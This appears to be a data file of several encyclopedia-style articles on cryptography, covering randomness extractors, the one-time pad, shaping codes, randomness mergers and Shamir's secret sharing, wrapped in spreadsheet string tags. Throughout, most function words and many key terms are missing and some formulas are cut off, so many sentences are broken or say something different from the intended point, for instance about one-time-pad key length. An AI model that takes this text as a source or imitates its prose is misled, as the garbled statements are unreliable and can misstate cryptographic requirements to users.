almost uniform probability. purpose almost-perfect resilient functions (aprf) used. definition aprf follows: definition (k-aprf): {\displaystyle k=k(n)} aprf function {\displaystyle where, setting {\displaystyle n-k} bits input {\displaystyle fixed values, probability vector {\displaystyle output {\displaystyle f(r)} random choices {\displaystyle remaining bits satisfies {\displaystyle |p_{i}-2^{-m}|&lt;2^{-m}\epsilon (n)} {\displaystyle negligible function {\displaystyle \epsilon (n)} kamp zuckerman proved theorem stating function {\displaystyle k-aprf, {\displaystyle also k-erf. more specifically, extractor sufficiently small error taking input oblivious, bit-fixing source also aprf therefore also k-erf. specific extractor expressed lemma: lemma: {\displaystyle 2^{-m}\epsilon (n)} -extractor {\displaystyle f:\{0,1\}^{n}\rightarrow \{0,1\}^{m}} {\displaystyle (n,k)} oblivious bit-fixing sources, {\displaystyle \epsilon (n)} negligible, also k-aprf. this lemma proved kamp zuckerman. lemma proved examining distance uniform output, {\displaystyle 2^{-m}\epsilon (n)} -extractor obviously {\displaystyle 2^{-m}\epsilon (n)} satisfies condition aprf. lemma leads following theorem, stating fact exists k-aprf function described: theorem (existence): positive constant {\displaystyle \gamma \leq {\frac {1}{2}}} exists explicit k-aprf {\displaystyle f:\{0,1\}^{n}\rightarrow \{0,1\}^{m}} computable linear number arithmetic operations {\displaystyle -bit strings, {\displaystyle m=\omega (n^{2\gamma {\displaystyle k=n^{{\frac {1}{2}}+\gamma definition (negligible function): proof theorem, need definition negligible function. function {\displaystyle \epsilon (n)} defined negligible {\displaystyle \epsilon (n)=o\left({\frac {1}{n^{c}}}\right)} constants {\displaystyle proof: consider following {\displaystyle \epsilon -extractor: function {\displaystyle extractor {\displaystyle (n,\delta oblivious bit-fixing source: {\displaystyle f:\{0,1\}^{n}\rightarrow \{0,1\}^{m}} {\displaystyle {\displaystyle m=\omega (\delta ^{2}n)} {\displaystyle \epsilon =2^{-cm}} {\displaystyle c&gt;1} proof extractor's existence {\displaystyle \delta \leq well fact computable linear computing time length {\displaystyle found paper jesse kamp david zuckerman 1240). that extractor fulfills criteria lemma trivially true {\displaystyle \epsilon =2^{-cm}} negligible function. size {\displaystyle {\displaystyle m=\omega (\delta ^{2}n)=\omega (n)\geq \omega (n^{2\gamma since know {\displaystyle \delta \leq lower bound {\displaystyle dominated {\displaystyle last step fact {\displaystyle \gamma \leq {\frac {1}{2}}} means power {\displaystyle {\displaystyle since {\displaystyle positive integer know {\displaystyle n^{2\gamma {\displaystyle value {\displaystyle calculated using definition extractor, know: {\displaystyle (n,k)=(n,\delta n)\rightarrow k=\delta using value {\displaystyle have: {\displaystyle m=\delta ^{2}n=n^{2\gamma using value {\displaystyle account worst case, {\displaystyle lower bound. algebraic calculations get: {\displaystyle \delta ^{2}n=n^{2\gamma {\displaystyle \rightarrow \delta ^{2}=n^{2\gamma -1}} {\displaystyle \rightarrow \delta =n^{\gamma -{\frac {1}{2}}}} which inserted value {\displaystyle gives {\displaystyle k=\delta n=n^{\gamma -{\frac {1}{2}}}n=n^{\gamma +{\frac {1}{2}}}} ,which proves exists explicit k-aprf extractor given properties. {\displaystyle \box examples neumann extractor perhaps earliest example john neumann. from input stream, extractor took bits, time (first second, third fourth, on). bits matched, output generated. bits differed, value first output. neumann extractor shown produce uniform output even distribution input bits uniform long probability correlation successive bits.thus, takes input bernoulli sequence necessarily equal 1/2, outputs bernoulli sequence {\displaystyle p=1/2.} more generally, applies exchangeable sequence—it relies fact pair, equally likely: independent trials, probabilities {\displaystyle p\cdot (1-p)=(1-p)\cdot exchangeable sequence probability complicated, equally likely. chaos machine another approach output chaos machine applied input stream. this approach generally relies properties chaotic systems. input bits pushed machine, evolving orbits trajectories multiple dynamical systems. thus, small differences input produce different outputs. such machine uniform output even distribution input bits uniform serious flaws, therefore weak entropy sources. additionally, scheme allows increased complexity, quality, security output stream, controlled specifying three parameters: time cost, memory required, secret key. cryptographic hash function also possible cryptographic hash function randomness extractor. however, every hashing algorithm suitable purpose. applications randomness extractors used widely cryptographic applications, whereby cryptographic hash function applied high-entropy, non-uniform source, disk drive timing information keyboard delays, yield uniformly random result. randomness extractors played part recent developments quantum cryptography, photons used randomness extractor generate secure random bits.[1] randomness extraction also used branches computational complexity theory. random extraction also used convert data simple random sample, normally distributed, independent, desired statistics. also decorrelation hardware random number generator randomness merger fuzzy extractor references randomness extractors independent sources applications, anup recent developments explicit constructions extractors, ronen shaltiel randomness extraction derivation using cbc, cascade hmac modes, yevgeniy dodis derivation randomness extraction, olivier chevassut deterministic extractors bit-fixing sources exposure-resilient cryptography, jesse kamp david zuckerman tossing biased coin (and optimality advanced multi-level strategy) (lecture notes), michael mitzenmacher</t>
  </si>
  <si>
    <t>One-time pad</t>
  </si>
  <si>
    <t>cryptography, one-time (otp) encryption technique cannot cracked, requires single-use pre-shared smaller message sent. technique, plaintext paired random secret (also referred one-time pad). then, character plaintext encrypted combining corresponding character using modular addition. resulting ciphertext impossible decrypt break following four conditions met: must least long plaintext. must random (uniformly distributed possible keys independent plaintext), entirely sampled non-algorithmic, chaotic source hardware random number generator. sufficient keys pass statistical randomness tests tests cannot measure entropy, number bits entropy must least equal number bits plaintext. example, using cryptographic hashes mathematical functions (such logarithm square root) generate keys fewer bits entropy would break uniform distribution requirement, therefore would provide perfect secrecy. must never reused whole part. must kept completely secret communicating parties.it also mathematically proven cipher property perfect secrecy must keys effectively requirements keys. digital versions one-time ciphers used nations critical diplomatic military communication, problems secure distribution make impractical applications. first described frank miller 1882, one-time re-invented 1917. july 1919, u.s. patent 1,310,719 issued gilbert vernam operation used encryption one-time pad. derived vernam cipher, system cipher combined message read punched tape. original form, vernam's system vulnerable tape loop, reused whenever loop made full cycle. one-time came later, joseph mauborgne recognized tape totally random, cryptanalysis would impossible.the "pad" part name comes early implementations material distributed paper, allowing current sheet torn destroyed use. concealment sometimes small powerful magnifying glass required used pads size could palm hand, walnut shell. increase security, one-time pads sometimes printed onto sheets highly flammable nitrocellulose, could easily burned use. there ambiguity term "vernam cipher" sources "vernam cipher" "one-time pad" synonymously, others refer additive stream cipher "vernam cipher", including based cryptographically secure pseudorandom number generator (csprng). history frank miller 1882 first describe one-time system securing telegraphy.the next one-time system electrical. 1917, gilbert vernam at&amp;t corporation) invented later patented 1919 (u.s. patent 1,310,719) cipher based teleprinter technology. each character message electrically combined character punched paper tape key. joseph mauborgne (then captain u.s. army later chief signal corps) recognized character sequence tape could completely random that, cryptanalysis would difficult. together invented first one-time tape system.the next development paper system. diplomats long used codes ciphers confidentiality minimize telegraph costs. codes, words phrases converted groups numbers (typically digits) using dictionary-like codebook. added security, secret numbers could combined (usually modular addition) code group transmission, secret numbers changed periodically (this called superencryption). early 1920s, three german cryptographers (werner kunze, rudolf schauffler, erich langlotz), involved breaking systems, realized could never broken separate randomly chosen additive number used every code group. they duplicate paper pads printed lines random number groups. each page serial number eight lines. each line 5-digit numbers. page would used work sheet encode message destroyed. serial number page would sent encoded message. recipient would reverse procedure destroy copy page. german foreign office system operation 1923.a separate notion one-time letters encode plaintext directly example below. marks describes inventing system british special operations executive world though suspected time already known highly compartmentalized world cryptography, instance bletchley park.the final discovery made information theorist claude shannon 1940s recognized proved theoretical significance one-time system. shannon delivered results classified report 1945 published openly 1949. time, soviet information theorist vladimir kotelnikov independently proved absolute security one-time pad; results delivered 1941 report apparently remains classified. example suppose alice wishes send message hello bob. assume pads paper containing identical random sequences letters somehow previously produced securely issued both. alice chooses appropriate unused page pad. normally arranged advance, instance "use 12th sheet may", "use next available sheet next message". material selected sheet message. each letter combined predetermined letter message. common, required, assign letter numerical value, e.g., on.) example, technique combine message using modular addition, unlike vigenère cipher. numerical values corresponding message letters added together, modulo material begins xmckl message hello, coding would done follows: message message message (message key) ciphertext number larger remainder subtraction taken modular arithmetic fashion. this simply means computations past" sequence starts ciphertext sent thus eqnvz. uses matching page process, reverse, obtain plaintext. here subtracted ciphertext, using modular arithmetic: ciphertext ciphertext ciphertext ciphertext (mod message similar above, number negative, added make number zero higher. thus recovers alice's plaintext, message hello. both alice destroy sheet immediately use, thus preventing reuse attack cipher. often issued agents one-time pads printed tiny sheets flash paper, paper chemically converted nitrocellulose, burns almost instantly leaves ash.the classical one-time espionage used actual pads minuscule, easily concealed paper, sharp pencil, mental arithmetic. method implemented software program, using data files input (plaintext), output (ciphertext) material (the required random sequence). exclusive (xor) operation often used combine plaintext elements, especially attractive computers since usually native machine instruction therefore fast. however, difficult ensure material actually random, used once, never becomes known opposition, completely destroyed use. auxiliary parts software one-time implementation present real challenges: secure handling/transmission plaintext, truly random keys, one-time-only key. attempt cryptanalysis continue example above, suppose intercepts alice's ciphertext: eqnvz. tried every possible key, would find xmckl would produce plaintext hello, would also find tquri would produce plaintext later, equally plausible message: ciphertext possible ciphertext-key ciphertext-key (mod fact, possible "decrypt" ciphertext message whatsoever number characters, simply using different key, information ciphertext allow choose among various possible readings ciphertext.if truly random, possible statistical analysis determine plausible keys "least" random therefore likely correct one. reused, noticeably produces sensible plaintexts ciphertexts (the chances random incorrect also producing sensible plaintexts slim). perfect secrecy one-time pads "information-theoretically secure" encrypted message (i.e., ciphertext) provides information original message cryptanalyst (except maximum possible length message). this strong notion security first developed wwii claude shannon proved, mathematically, true one-time shannon time. result published bell system technical journal 1949. properly used, one-time pads secure sense even adversaries infinite computational power. claude shannon proved, using information theoretic considerations, one-time property termed perfect secrecy; ciphertext gives absolutely additional information plaintext. this (intuitively), given truly uniformly random used once, ciphertext translated plaintext length, equally likely. thus, priori probability plaintext message posteriori probability plaintext message given corresponding ciphertext. mathematically, expressed {\textstyle \mathrm (m)=\mathrm (m|c)} {\textstyle \mathrm (m)} information entropy plaintext {\textstyle \mathrm (m|c)} conditional entropy plaintext given ciphertext (here, capital greek letter eta.) this implies every message corresponding ciphertext must least binds one-time pad. mathematically speaking, means {\textstyle k\geq c\geq must hold, {\textstyle k,c,m} denote quantities possible keys, ciphers messages, respectively. words, able plaintext message space cipher cipher space (via encryption) cipher cipher-space plain text message space (decryption), would require least {\displaystyle |m|=|c|} keys (with keys used equal probability {\displaystyle 1/|k|} ensure perfect secrecy). another stating perfect secrecy messages {\displaystyle m_{1},m_{2}} message space ciphers cipher space {\displaystyle {\underset {k\leftarrow \mathrm }{\operatorname {pr} }}[e_{k}(m_{1})=c]={\underset {k\leftarrow \mathrm }{\operatorname {pr} }}[e_{k}(m_{2})=c]} {\textstyle \operatorname {pr} represents probabilities, taken choice {\displaystyle space {\displaystyle \mathrm coin tosses probabilistic algorithm, {\displaystyle perfect secrecy strong notion cryptanalytic difficulty.conventional symmetric encryption algorithms complex patterns substitution transpositions. best currently use, known whether cryptanalytic procedure efficiently reverse even partially reverse) transformations without knowing used encryption. asymmetric encryption algorithms depend mathematical problems thought difficult solve, integer factorization discrete logarithm. however, proof problems hard, mathematical breakthrough could make existing systems vulnerable attack.given perfect secrecy, contrast conventional symmetric encryption, one-time immune even brute-force attacks. trying keys simply yields plaintexts, equally likely actual plaintext. even partially known plaintext, brute-force attacks cannot used, since attacker unable gain information parts needed decrypt rest message. parts plaintext known reveal parts corresponding them, correspond strictly one-to-one basis; uniformly random key's bits independent. quantum computers shown peter shor others much faster solving problems security traditional asymmetric encryption algorithms depends cryptographic algorithms depend problem's difficulty would rendered obsolete powerful enough quantum computer. one-time pads, however, would remain secure, perfect secrecy depend assumptions computational resources attacker. quantum cryptography post-quantum cryptography involve studying impact quantum computers information security. problems despite shannon's proof security, one-time serious drawbacks practice requires: truly random, opposed pseudorandom, one-time values, non-trivial requirement. random number generation computers often difficult, pseudorandom number generators often used speed usefulness applications. true random number generators exist, typically slower specialized. secure generation exchange one-time values, must least long message. this important security one-time depends security one-time exchange. attacker able intercept one-time value, decrypt messages sent using one-time pad. careful treatment make sure one-time values continue remain secret disposed correctly, preventing reuse (partially entirely) —hence "one-time". problems data remanence make difficult completely erase computer media.one-time pads solve current practical problems cryptography. high quality ciphers widely available security currently considered major worry. such ciphers almost always easier employ one-time pads amount material must properly securely generated, distributed stored smaller.additionally, public cryptography overcomes problem distribution. true randomness high-quality random numbers difficult generate. random number generation functions programming language libraries suitable cryptographic use. even generators suitable normal cryptographic use, including /dev/random many hardware random number generators, make cryptographic functions whose security proven. example technique generating pure randomness measuring radioactive emissions.in particular, one-time absolutely necessary. one-time used twice, simple mathematical operations reduce running cipher. example, {\displaystyle p_{1}} {\displaystyle p_{2}} represent distinct plaintext messages encrypted common {\displaystyle respective ciphertexts given {\displaystyle c_{1}=p_{1}\oplus {\displaystyle c_{2}=p_{2}\oplus {\displaystyle \oplus means xor. attacker ciphertexts {\displaystyle c_{1}} {\displaystyle c_{2}} simply taking {\displaystyle c_{1}} {\displaystyle c_{2}} yields plaintexts {\displaystyle p_{1}\oplus p_{2}} (this taking common {\displaystyle yields constant bitstream zeros.) {\displaystyle p_{1}\oplus p_{2}} equivalent running cipher. plaintexts natural language (e.g., english russian), stands high chance recovered heuristic cryptanalysis, possibly ambiguities. course, longer message broken portion overlaps shorter message, plus perhaps little completing word phrase. famous exploit vulnerability occurred venona project. distribution because pad, like shared secrets, must passed kept secure, least long message, often point using one-time padding, simply send plain text instead size sent securely). however, long securely sent (e.g., computer disk full random data), used numerous future messages, message's sizes equals size pad. quantum distribution also proposes solution problem, assuming fault-tolerant quantum computers. distributing long one-time keys inconvenient usually poses significant security risk. essentially encryption key, unlike keys modern ciphers, must extremely long difficult humans remember. storage media thumb drives, dvd-rs personal digital audio players used carry large one-time-pad place place non-suspicious way, need transport physically burden compared negotiation protocols modern public-key cryptosystem. such media cannot reliably erased securely means short physical destruction (e.g., incineration). dvd-r full one-time-pad data, shredded particles (0.0016 size, leaves megabits data particle. addition, risk compromise transit (for example, pickpocket swiping, copying replacing pad) likely much greater practice likelihood compromise cipher aes. finally, effort needed manage one-time material scales badly large networks communicants—the number pads required goes square number users freely exchanging messages. communication persons, star network topology, less problem. material must securely disposed use, ensure material never reused protect messages sent. because material must transported endpoint another, persist message sent received, vulnerable forensic recovery transient plaintext protects (because possible data remanence). authentication traditionally used, one-time pads provide message authentication, lack pose security threat real-world systems. example, attacker knows message contains "meet jane tomorrow three thirty derive corresponding codes directly known elements (the encrypted text known plaintext). attacker replace text text exactly length, "three thirty meeting canceled, stay home". attacker's knowledge one-time limited byte length, must maintained content message remain valid. this different malleability plaintext necessarily known. without knowing message, attacker also flip bits message sent one-time pad, without recipient able detect because similarities, attacks one-time pads similar attacks stream ciphers.standard techniques prevent this, message authentication code used along one-time system prevent attacks, classical methods variable length padding russian copulation, lack perfect security has. universal hashing provides authenticate messages arbitrary security bound (i.e., large enough hash ensures even computationally unbounded attacker's likelihood successful forgery less uses additional random data pad, techniques remove possibility implementing system without computer. common implementation errors relative simplicity implementation, promise perfect secrecy, one-time-pad enjoys high popularity among students learning cryptography, especially often first algorithm presented implemented course. such "first" implementations often break requirements information theoretical security ways: generated algorithm, expands small values longer "one-time-pad". this applies equally algorithms, insecure basic mathematical operations like square root decimal expansions, complex, cryptographically secure pseudo-random random number generators (csprngs). none implementations one-time-pads, stream ciphers definition. one-time pads must generated non-algorithmic process, e.g. hardware random number generator. exchanged using non-information-theoretically secure methods. one-time-pad encrypted non-information theoretically secure algorithm delivery, security cryptosystem secure insecure delivery mechanism. common flawed delivery mechanism one-time-pad standard hybrid cryptosystem relies symmetric cryptography encryption, asymmetric cryptography symmetric delivery. common secure methods one-time delivery quantum distribution, sneakernet courier service, dead drop. implementation feature unconditionally secure authentication mechanism one-time mac. reused (exploited venona project, example). destroyed immediately use. uses applicability despite problems, one-time-pad retains practical interest. hypothetical espionage situations, one-time might useful encryption decryption computed hand pencil paper. nearly high quality ciphers entirely impractical without computers. modern world, however, computers (such embedded mobile phones) ubiquitous possessing computer suitable performing conventional encryption (for example, phone concealed cryptographic software) usually attract suspicion. one-time-pad optimum cryptosystem theoretically perfect secrecy. one-time-pad practical methods encryption parties must work hand, without computer. this made important pre-computer era, could conceivably still useful situations possession computer illegal incriminating trustworthy computers available. one-time pads practical situations parties secure environment must able depart another communicate separate secure environments perfect secrecy. one-time-pad used superencryption. algorithm commonly associated quantum distribution one-time pad. one-time mimicked stream ciphers. numbers stations often send messages encrypted one-time pad. quantum post-quantum cryptography common one-time quantum cryptography used association quantum distribution (qkd). typically associated one-time provides distributing long shared secret securely efficiently (assuming existence practical quantum networking hardware). algorithm uses properties quantum mechanical systems parties agree shared, uniformly random string. algorithms qkd, bb84 also able determine whether adversarial party attempting intercept material, allow shared secret agreed upon relatively messages exchanged relatively computational overhead. high level, schemes work taking advantage destructive quantum states measured exchange secret detect tampering. original bb84 paper, proven one-time pad, keys distributed perfectly secure encryption scheme. however, result depends scheme implemented correctly practice. attacks real-world systems exist. instance, many systems send single photon object desired quantum state) practical limitations, attacker could intercept measure photons associated message, gaining information (i.e. leaking information pad), passing along unmeasured photons corresponding key. combining one-time also loosen requirements reuse. 1982, bennett brassard showed protocol detect adversary trying intercept exchanged key, safely reused preserving perfect secrecy.there also exists quantum analogue time pad, used exchange quantum states along one-way quantum channel perfect secrecy, sometimes used quantum computing. shown shared secret least classical bits required exchange n-qubit quantum state along one-way quantum channel analogue result bits required exchange message perfect secrecy). scheme proposed 2000 achieves bound. implement quantum one-time dividing pairs bits. encrypt state, pair bits key, would apply gate qubit state first pair apply gate qubit state second pair decryption involves applying transformation again, since inverses. this shown perfectly secret quantum setting.the one-time example post-quantum cryptography, perfect secrecy definition security depend computational resources adversary. consequently, adversary quantum computer would still able gain information message encrypted time adversary classical computer. historical uses one-time pads used special circumstances since early 1900s. 1923, employed diplomatic communications german diplomatic establishment. weimar republic diplomatic service began using method 1920. breaking poor soviet cryptography british, messages made public political reasons instances 1920s (arcos case), appear caused soviet union adopt one-time pads purposes around 1930. spies also known used pencil paper one-time pads recently. examples include colonel rudolf abel, arrested convicted york city 1950s, 'krogers' (i.e., morris lona cohen), arrested convicted espionage united kingdom early 1960s. both found physical one-time pads possession. number nations used one-time systems sensitive traffic. marks reports british special operations executive used one-time pads world encode traffic offices. one-time pads overseas agents introduced late war. british one-time tape cipher machines include rockex noreen. german stasi sprach machine also capable using time tape east germany, russia, even cuba used send encrypted messages agents.the world voice scrambler sigsaly also form one-time system. added noise signal removed end. noise distributed channel ends form large shellac records manufactured unique pairs. there starting synchronization longer-term phase drift problems arose solved system could used.the hotline moscow washington d.c., established 1963 1962 cuban missile crisis, used teleprinters protected commercial one-time tape system. each country prepared keying tapes used encode messages delivered embassy country. unique advantage case neither country reveal sensitive encryption methods other.u.s. army special forces used one-time pads vietnam. using morse code one-time pads continuous wave radio transmission (the carrier morse code), achieved secrecy reliable communications.starting 1988, african national congress (anc) used disk-based one-time pads part secure communication system leaders outside south africa in-country operatives part operation vula, successful effort build resistance network inside south africa. random numbers disk erased use. belgian airline stewardess acted courier bring disks. regular resupply disks needed used fairly quickly. problem system could used secure data storage. later vula added stream cipher keyed book codes solve problem.a related notion one-time code—a signal, used once; e.g., "alpha" "mission completed", "bravo" "mission failed" even "torch" "allied invasion french northern africa" cannot "decrypted" reasonable sense word. understanding message require additional information, often 'depth' repetition, traffic analysis. however, strategies (though often used real operatives, baseball coaches) cryptographic one-time significant sense. least 1970s, u.s. national security agency (nsa) produced variety manual one-time pads, general purpose specialized, 86,000 one-time pads produced fiscal year 1972. special purpose pads produced called "pro forma" systems, “the basic framework, form format every message text identical nearly kind information, message message, presented order, specific values, like numbers, change message.” examples included nuclear launch messages radio direction finding reports (comus).: 16–18 general purpose pads produced several formats, simple list random letters (diana) numbers (calypso), tiny pads covert agents (mickey mouse), pads designed rapid encoding short messages, cost lower density. example, orion, rows plaintext alphabets side corresponding random cipher text letters side. placing sheet piece carbon paper carbon face could circle letter side corresponding letter side would circled carbon paper. thus orion sheet could quickly encode decode message characters long. production orion pads required printing sides exact registration, difficult process, switched another format, medea, rows paired alphabets random characters. (see commons:category:nsa one-time pads illustrations.) also built automated systems "centralized headquarters special forces units efficiently process many separate one-time messages individual holders field".: 21–26 during world 1950s, u.s. made extensive one-time tape systems. addition providing confidentiality, circuits secured one-time tape continually, even traffic, thus protecting traffic analysis. 1955, produced 1,660,000 rolls time tape. each roll inches diameter, contained 100,000 characters, lasted minutes cost $4.55 produce. 1972, 55,000 rolls produced, one-time tapes replaced rotor machines sigtot, later electronic devices based shift registers.: 39–44 describes one-time tape systems like 5-uco sigtot used intelligence traffic introduction electronic cipher based kw-26 1957. exploits while one-time pads provide perfect secrecy generated used properly, small mistakes lead successful cryptanalysis: 1944–1945, u.s. army's signals intelligence service able solve one-time system used german foreign office high-level traffic, codenamed gee. insecure pads sufficiently random—the machine used generate pads produced predictable output. 1945, discovered canberra–moscow messages encrypted first using code-book using one-time pad. however, one-time used used moscow washington, d.c.–moscow messages. combined fact canberra–moscow messages included known british government documents, allowed encrypted messages broken. one-time pads employed soviet espionage agencies covert communications agents agent controllers. analysis shown pads generated typists using actual typewriters. this method truly random, makes pads likely contain certain convenient sequences frequently. this proved generally effective pads still somewhat unpredictable typists following rules, different typists produced different patterns pads. without copies material used, defect generation method reuse keys offered much hope cryptanalysis. beginning late 1940s, intelligence agencies able break soviet one-time traffic moscow wwii result errors made generating distributing material. suggestion moscow centre personnel somewhat rushed presence german troops outside moscow late 1941 early 1942, produced copy material period. this decades-long effort finally codenamed venona (bride earlier name); produced considerable amount information. even small percentage intercepted messages either fully partially decrypted thousand several hundred thousand). one-time tape systems used u.s. employed electromechanical mixers combine bits message one-time tape. these mixers radiated considerable electromagnetic energy could picked adversary distance encryption equipment. this effect, first noticed bell labs world could allow interception recovery plaintext messages transmitted, vulnerability code-named tempest.: also notes references further reading external links detailed description history one-time examples images cipher machines cryptology frees/wan glossary entry discussion weaknesses</t>
  </si>
  <si>
    <t>Shaping codes</t>
  </si>
  <si>
    <t>digital communications shaping codes method encoding changes distribution signals improve efficiency. description typical digital communication systems uses m-quadrature amplitude modulation(qam) communicate analog channel (specifically communication channel gaussian noise). higher rates(m) minimum signal-to-noise ratio (snr) required system error correcting codes 1.53 higher minimum required gaussian source(&gt;30% transmitter power) given shannon–hartley theorem {\displaystyle c=b\log _{2}\left(1+{\frac {s}{n}}\right)} channel capacity bits second; bandwidth channel hertz; total signal power bandwidth total noise power bandwidth. signal-to-noise ratio communication signal gaussian noise interference expressed straight power ratio (not decibels).this 1.53 difference called shaping gap. typically digital system encode bits uniform probability maximize entropy. shaping code buffer digital sources modulator communication system. they receive uniformly distributed data convert gaussian like distribution presenting modulator. shaping codes helpful reducing transmit power thus reduce cost power amplifier interference caused users vicinity. application some methods used shaping described trellis shaping paper forney jr.shell mapping used v.34 modems shaping gain shaping schemes literature reduce transmitted signal power. future find application wireless networks interference nodes becoming major issue. references trellis shaping modulation systems</t>
  </si>
  <si>
    <t>Randomness merger</t>
  </si>
  <si>
    <t>extractor theory, randomness merger function extracts randomness random variables, provided least uniformly random. name stems fact seen procedure "merges" variables one, preserving least entropy contained uniformly random variable. mergers currently used order explicitly construct randomness extractors. intuition definition consider {\displaystyle random variables, {\displaystyle x_{1},\ldots ,x_{k}} distributed {\displaystyle \{0,1\}^{n}} least uniformly random; known one. furthermore, variables arbitrarily correlated: functions another, constant, however, since least uniform, whole contains least {\displaystyle bits entropy. merger output random variable, also distributed {\displaystyle \{0,1\}^{n}} retains much entropy possible. ideally, known variables uniform, could used output, information known. idea behind mergers using small additional random seed, possible good result even without knowing uniform variable. definition (merger): function {\displaystyle m:(\{0,1\}^{n})^{k}\times \{0,1\}^{d}\rightarrow \{0,1\}^{n}} called {\displaystyle (m,\varepsilon -merger every random variables {\displaystyle (x_{1},\ldots ,x_{k})} distributed {\displaystyle \{0,1\}^{n}} least uniform, distribution {\displaystyle z=m(x_{1},\ldots ,x_{k},u_{d})} smooth min-entropy {\displaystyle h_{\infty }^{\varepsilon }(z)\geq variable {\displaystyle u_{d}} denotes uniform distribution {\displaystyle bits, represents truly random seed. words, using small uniform seed length {\displaystyle merger returns string {\displaystyle \varepsilon -close least {\displaystyle min-entropy; means statistical distance string {\displaystyle min-entropy larger {\displaystyle \varepsilon reminder: there several notions measuring randomness distribution; min-entropy random variable {\displaystyle defined largest {\displaystyle probable value {\displaystyle occurs probability {\displaystyle 2^{-k}} min-entropy string upper bound amount randomness extracted parameters there three parameters optimize building mergers: output's min-entropy {\displaystyle high possible, bits extracted {\displaystyle \varepsilon small possible, applying extractor merger's output, result closer uniform. seed length {\displaystyle small possible, merger requires fewer initial truly random bits work.explicit constructions mergers known relatively good parameters. example, dvir wigderson's construction gives: every {\displaystyle \alpha integer {\displaystyle {\displaystyle k\leq 2^{o(n)}} exists explicit {\displaystyle (m,\varepsilon -merger {\displaystyle m:(\{0,1\}^{n})^{k}\times \{0,1\}^{d}\rightarrow \{0,1\}^{n}} that: {\displaystyle m=(1-\alpha )n,} {\displaystyle d=o(\log(n)+\log(k)),} {\displaystyle \varepsilon =o\left({\frac {1}{n\cdot k}}\right).} proof constructive allows building merger polynomial time given parameters. usage possible mergers order produce randomness extractors good parameters. recall extractor function takes random variable high min-entropy, returns smaller random variable, close uniform. arbitrary min-entropy extractor obtained using following merger-based scheme: given source high min-entropy, partition blocks. known result, least partitions also high min-entropy block-source. apply block extractor separately blocks. this weaker sort extractor, good constructions known. since least blocks high min-entropy, least outputs close uniform. merger combine previous outputs string. good merger used, resultant string high min-entropy compared length. known extractor works high min-entropy sources extract randomness.the essence scheme merger order transform string arbitrary min-entropy smaller string, losing min-entropy process. this string high min-entropy compared length, possible older, known, extractors work type strings. also randomness extractor references</t>
  </si>
  <si>
    <t>Shamir's Secret Sharing</t>
  </si>
  <si>
    <t>shamir's secret sharing, formulated shamir, first secret sharing schemes cryptography. based polynomial interpolation finite fields. high-level explanation shamir's secret sharing (sss) used secure secret distributed way, often secure encryption keys. secret split multiple parts, called shares, individually give information secret. unlock secret shamir's secret sharing, minimum number shares needed. this called threshold, used denote minimum number shares needed unlock secret. adversary discovers number shares less threshold additional information secured secret-- called perfect secrecy. sense, generalisation one-time (which viewed two-share threshold shares total). consider example:problem: company needs secure vault's passcode. they could something standard, aes, holder could unavailable die. could compromised malicious hacker holder could turn rogue, adversary could benefit.sss used situation. used share vault's passcode generate certain number shares, certain number shares allocated executive within company xyz. now, executives unlock vault combine shares threshold. threshold appropriately number executives, vault always accessible authorized individuals. small number shares compromised, shares could used find passcode unless executives cooperated. mathematical formulation shamir's secret sharing ideal perfect {\displaystyle \left(k,n\right)} -threshold scheme. scheme, divide secret {\displaystyle (for example, combination safe) {\displaystyle pieces data {\displaystyle s_{1},\ldots ,s_{n}} (known shares) that: knowledge {\displaystyle shares {\displaystyle s_{i}} makes {\displaystyle easily computable. that complete secret {\displaystyle reconstructed combination {\displaystyle shares data. knowledge {\displaystyle k-1} fewer shares {\displaystyle s_{i}} leaves {\displaystyle completely undetermined, sense possible values {\displaystyle seem likely knowledge {\displaystyle k-1} shares knowledge {\displaystyle shares. secret {\displaystyle cannot reconstructed fewer {\displaystyle shares. {\displaystyle n=k} every piece original secret {\displaystyle required reconstruct secret. essential idea scheme based lagrange interpolation theorem, specifically {\displaystyle k\,\!} points enough uniquely determine polynomial degree less equal {\displaystyle k-1\,\!} instance, points sufficient define line, points sufficient define parabola, points define cubic curve forth. assume secret {\displaystyle represented element {\displaystyle a_{0}} finite field {\displaystyle gf(q)} (where {\displaystyle larger number shares generated). randomly choose {\displaystyle k-1} elements, {\displaystyle a_{1},\cdots ,a_{k-1}\,\!} {\displaystyle gf(q)} construct polynomial {\displaystyle f\left(x\right)=a_{0}+a_{1}x+a_{2}x^{2}+a_{3}x^{3}+\cdots +a_{k-1}x^{k-1}\,\!} compute {\displaystyle n\,\!} points curve, instance {\displaystyle i=1,\ldots ,n\,\!} find points {\displaystyle \left(i,f\left(i\right)\right)\,\!} every participant given point non-zero input polynomial, corresponding output). given subset {\displaystyle k\,\!} pairs, {\displaystyle a_{0}} obtained using interpolation, possible formula {\displaystyle a_{0}=f(0)=\sum _{j=0}^{k-1}y_{j}\prod _{\begin{smallmatrix}m\,=\,0\\m\,\neq \,j\end{smallmatrix}}^{k-1}{\frac {x_{m}}{x_{m}-x_{j}}}} list points polynomial given pairs form {\displaystyle (x_{i},y_{i})} note {\displaystyle f(0)} equal first coefficient polynomial {\displaystyle f(x)} usage example following example illustrates basic idea. note, however, calculations example done using integer arithmetic rather using finite field arithmetic make idea easier understand. therefore example provide perfect secrecy proper example shamir's scheme. next example explain problem. preparation suppose secret shared 1234 1234 {\displaystyle (s=1234)\,\!} example, secret split shares {\displaystyle (n=6)\,\!} subset shares {\displaystyle (k=3)\,\!} sufficient reconstruct secret. {\displaystyle k-1=2} numbers taken random. this yields coefficients 1234 {\displaystyle (a_{0}=1234;a_{1}=166;a_{2}=94),\,\!} {\displaystyle a_{0}} secretthe polynomial produce secret shares (points) therefore: 1234 {\displaystyle f(x)=1234+166x+94x^{2}\,\!} points {\displaystyle d_{x-1}=(x,f(x))} polynomial constructed 1494 1942 2578 3402 4414 5614 {\displaystyle d_{0}=(1,1494);d_{1}=(2,1942);d_{2}=(3,2578);d_{3}=(4,3402);d_{4}=(5,4414);d_{5}=(6,5614)\,\!} each participant scheme receives different point pair {\displaystyle x\,\!} {\displaystyle f(x)\,\!} because {\displaystyle d_{x-1}} used instead {\displaystyle d_{x}} points start {\displaystyle (1,f(1))} {\displaystyle (0,f(0))} this necessary {\displaystyle f(0)} secret. reconstruction order reconstruct secret, points sufficient consider using points 1942 3402 4414 {\displaystyle \left(x_{0},y_{0}\right)=\left(2,1942\right);\left(x_{1},y_{1}\right)=\left(4,3402\right);\left(x_{2},y_{2}\right)=\left(5,4414\right)\,\!} computing the: lagrange basis polynomials: {\displaystyle \ell _{0}(x)={\frac {x-x_{1}}{x_{0}-x_{1}}}\cdot 